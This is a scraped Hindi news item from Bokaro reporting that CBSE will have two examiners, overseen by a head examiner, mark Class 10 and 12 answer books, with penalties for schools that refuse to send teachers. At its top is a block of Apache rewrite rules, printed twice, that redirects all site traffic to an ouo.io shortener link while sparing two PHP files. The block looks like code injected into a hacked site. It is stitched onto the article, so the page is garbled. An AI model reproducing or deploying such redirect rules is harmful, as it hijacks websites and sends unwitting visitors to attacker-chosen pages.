
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 341
Previous Nextबोकारो। सीबीएसई ने इस बार मूल्यांकन प्रक्रिया में बड़ा बदलाव किया है। इस बार 10वीं बोर्ड और 12वीं कक्षा के छात्रों की उत्तरपुस्तिका की जांच एक नहीं, बल्कि दो शिक्षकों से कराई जाएगी, ताकि रिजल्ट में पारदर्शिता बनी रहे। सीबीएसई बोर्ड की बैठक में यह निर्णय लिया गया। इस बाबत सीबीएसई बोर्ड ने दिशा-निर्देश जारी कर दिए। इससे पहले सीबीएसई की उत्तरपुस्तिका की जांच एक ही शिक्षक करते थे। वर्तमान में सीबीएसई की बोर्ड परीक्षाएं चल रही हैं। इस बीच, बोर्ड ने मूल्यांकन को लेकर कुछ बदलाव किए। इसके तहत परीक्षा परिणाम में पारदर्शिता और मूल्यांकन सही हो, इसके लिए डबल मूल्यांकन का प्रावधान किया गया। नए नियमों के मुताबिक अब दो मूल्यांकन करने वाले एग्जामिनर पर एक हेड एग्जामिनर तैनात रहेगा। सीबीएसई बोर्ड स्कूलों को यह निर्देश दिया गया कि वह मूल्यांकन में अनिवार्य तौर पर अपने शिक्षक भेजें। कहा गया कि अगर कोई स्कूल आनाकानी करेगा, तो उसका रिजल्ट रोक दिया जाएगा। इसके अलावा स्कूल के खिलाफ जुर्माने से लेकर मान्यता खत्म करने की भी प्रक्रिया अमल में लाई जा सकती है।